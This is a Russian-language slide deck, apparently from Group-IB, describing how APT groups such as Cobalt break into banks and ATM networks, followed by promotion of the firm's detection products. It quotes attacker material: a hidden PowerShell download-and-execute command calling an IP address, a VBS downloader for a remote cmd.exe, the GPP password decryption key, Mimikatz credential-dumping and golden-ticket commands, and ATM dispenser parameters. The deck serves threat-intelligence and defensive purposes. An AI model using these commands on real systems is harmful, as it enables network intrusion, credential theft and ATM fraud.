3. 3
Почему невозможно быть полностью защищенным
ТЫСЯЧИ
СОТРУДНИКОВ
Не все сотрудники
эксперты по безопасности.
Им надо получать и
открывать письма от
коллег, руководства и т.д.
для выполнения своих
служебных обязанностей
Атакующие могут
звонить прежде чем
отправить письмо,
воспользоваться
взломанной почтой
коллег
Многие просто покупают
решения по безопасности и
чувствуют себя
защищёнными, перекладывая
ответственность на вендора.
Нет процедуры реагирования
на инцидент
УМНЫЙ
ФИШИНГ
СТАРАЯ
ПАРАДИГМА
10 минут
время необходимое
для получения полного
контроля над сетью
4. 4
Шаблон атак легко копировать
1
Целевой фишинг,
покупка загрузок,
уязвимость во внешней
системе
Собирают реквизиты доступа к
центральным серверам и
пароли администраторов
использую открытую утилиту
Mimikatz
НАЧАЛЬНОЕ
ПРОНИКНОВЕНИЕ 2 УДАЛЕННЫЙ
ДОСТУП 3 ПОЛУЧЕНИЕ
ПРИВИЛЕГИЙ
6 ПРОТИВОДЕЙСТВИЕ
РАССЛЕДОВАНИЮ
Атакующие используют
удаленный доступ для
более глубокого
проникновения в сети
Атакующие ищут компьютеры с
которых можно получить
доступ к критичным системам
(АРМ КБР, SWIFT, карточный
процессинг, системы
управления банкоматами)
Получают доступ к
системам, как легитимный
оператор, наблюдают за
ним и выполняют те же
действия
Уничтожают данные после
атаки и компьютеры
5 ЗАВЕРШЕНИЕ
АТАКИ4 СБОР
ДАННЫХ
6. 6
Закрепление на локальной системе
ЭКСПЛОЙТ,
EXE, VBS-СКРИПТ
Троян в зашифрованном архиве
CVE-2015-1641
VBS скрипт
Вредоносный модуль
загружается и
храниться только в
оперативной памяти
Получение списка легитимного ПО в
автозагрузке и замена исполняемых
файлов:
• iusb3mon. exe (Intel(R) USB 3.0 eXtensible
Host Controller)
• jusched.exe (Sun Java Update Scheduler)
Либо создания задач в Windows Scheduler
ОПЕРАТИВНАЯ
ПАМЯТЬ
АВТОЗАГРУЗКА
И ЛЕГАЛЬНОЕ ПО
PowerShell скрипт:
«C:Windowssystem32cmd.exe - powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://84.200.84.241:800/arp'))»
VBS скрипт:
var u = 'https://filebin.net/1xpzydyqftzdm48k/cmd.exe'.split(',');for(i = 0; i < u.length; i++){try{var h = new
ActiveXObject('msxml2.xmlhttp');h.open('GET', u[i], false);h.send();if(h.status == 200 && h.responsetext.substr(0, 2) == 'MZ')
7. 7
Повышение привилегий
ОШИБКА КОНФИГУРАЦИИ
КОНТРОЛЛЕРА ДОМЕНА
• Использование Group Policy Preferences (GPP)
• «[server_name]sysvol[domain_name]Policies[group_policy_na
me]MachinePreferencesGroupsGroups.xml»
• Из файла Groups.xml они извлекают логин и пароль
администратора домена из полей cpassword и userName.
(пароль в зашифрованном с помощью AES-256 алгоритме и
закодированном по Base64)
• Для получения пароля в открытом виде атакующие
декодируют пароль по Base64
• Полученный зашифрованный пароль расшифровывается
с помощью ключа
4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a43
3b66c1b
8. 8
Повышение привилегий
УТИЛИТА MIMIKATZ
Есть доступ к DC
mimikatz sekurlsa::logonpasswords
Нет доступа к DC, но есть LA
Подключение к рабочим станциям и серверам с целью поиска
учетной записи с доступом к DC
Нет прав LA и нет доступа к DC
CVE-2014-4113, CVE-2015-1701, CVE-2015-2363 и CVE-2015-2426,
которые позволяли поднять привилегии до уровня SYSTEM на x32 и x64.
Если на локальной системе не работает, то подключается к другим хостам
пока не найдет уязвимый
Золотой билет
• "privilege::debug" "lsadump::samrpc /patch" exit
• извлечение NTLM-хеш учетной записи krbtgt (Key Distribution Center Service
Account)
• создают файл с золотым TGT билетом
9. 9
Поиск нужных систем с доступом к банкоматной сети
netscan.exe – сетевой сканнер NetScan
patch86.exe – патчинг Termsrv для поддержки одновременных терминальных сессий
plink.exe – консольный ssh клиент для Windows
psexec.exe – консольная утили для удаленного управления на Windows
11. 11
Программы для банкоматов
ServiceLogicalName - имя сервиса, используемое в качестве аргумента для функции WFSOpen (например «Cash Dispenser Module»).
Cassettes Count - общее число кассет, присутствующих на устройстве. Значение должно быть в интервале от 1 до 15.
Cassette Number - номер кассеты, из которой следует выдать наличность. Значение должно быть в интервале от 1 до 15.
Banknotes Count - число банкнот, которое необходимо выдать из кассеты. Значение должно быть в интервале от 1 до 60.
Dispenses Count - означает какое количество раз необходимо повторить выдачу наличности. Значение должно быть в интервале
от 1 до 60.
Программа, использует стандартные функции по интерфейсу
XFS через XFS Manager (eXtensions for Financial Services).
13. 13
Система выявления ранее неизвестного
вредоносного кода с использованием
передовых алгоритмов машинного обучения
Скачиваемые файлы
Объекты, скачиваемые
пользователями и их
компьютерами при атаке
их браузеров
и другие ранее неизвестные
вредоносные объекты,
не определяемые
антивирусами
и сигнатурным подходом.
Круглосуточная поддержка
вашей службы безопасности
и сопровождение процесса
реагирования опытными
специалистами Group-IB
Полная конфиденциальность
– обработка и анализ файлов
внутри вашего контура
безопасности
Почтовые вложения
Вредоносные файлы, получаемые
пользователями через почтовую
систему в ходе целевых атак и
применения социальной
инженерии
Целевые атаки
Вредоносное ПО, нацеленное
эксклюзивно на вашу
инфраструктуру
14. 1
4
Сенсор анализа трафика SOC GROUP-IB
Сведения об инцидентах, полученные от
сенсора, классифицируются и
коррелируются в Центре обработки данных.
События анализируются квалифицированными
специалистами Group-IB вручную.
Эксперты SOC уведомят ваших специалистов о
критичных угрозах по телефону и e-mail, а все
результаты анализа будут доступны в
удобном web-интерфейсе.
Опытные специалисты Group-IB берут
на себя работу по выявлению
критичных инцидентов, позволяя вашей
службе ИБ сосредоточиться на
реагировании.
выявляет зараженные узлы,
устанавливая их
взаимодействия
с командными центрами по
признакамвредоносной
активности, разрабатываемым
на основе данных из
уникальных источников.
детектирует сетевые аномалии,
генерируемые вредоносными
программами, при помощи
алгоритмов машинного
обучения.
интегрируется с системой
поведенческого анализа Polygon
для выявления ранее
неизвестного вредоносного
кода.
передает информацию
о выявленных инцидентах в
SOC Group-IB по безопасному
каналу либо в любую
внутреннюю корпоративную
систему учета событий ИБ.
Анализ данных ведется круглосуточно,
без выходных
Как работает TDS
22. Рассылка Cobalt 10 марта 2017г
Первая волна 10.03.2017, 12:57, Банк 1
Вторая волна 10.03.2017, 15:12, Банк 2
Адрес: media@ecb-europe.com
23. 23
Что делать, чтобы предотвратить APT атаку
КИБЕРРАЗВЕДКА ОБНАРУЖЕНИЕ
РЕАГИРОВАНИЕ
Отслеживайте появление новых
методов и инструментов атак
Используйте специальные системы
обнаружения целевых атак
При обнаружении следов атаки
вызывайте команду профессиональных
криминалистов
Присылайте подозрительные файлы
для анализа – intelligence@group-
ib.ru
АНАЛИЗ
Анализируйте подозрительные
файлы в изолированной среде
Запишитесь на бесплатный тест-драйв
комплекса TDS + Polygon - www.group-ib.ru/tds.html
ЦЕНТР РЕАГИРОВАНИЯ
CERT-GIB
Круглосуточная помощь
опытных специалистов
в реагировании на инциденты
РАССЛЕДОВАНИЯ
И КРИМИНАЛИСТИКА
Безупречный сбор доказательной
базы и оперативное установление
личностей преступников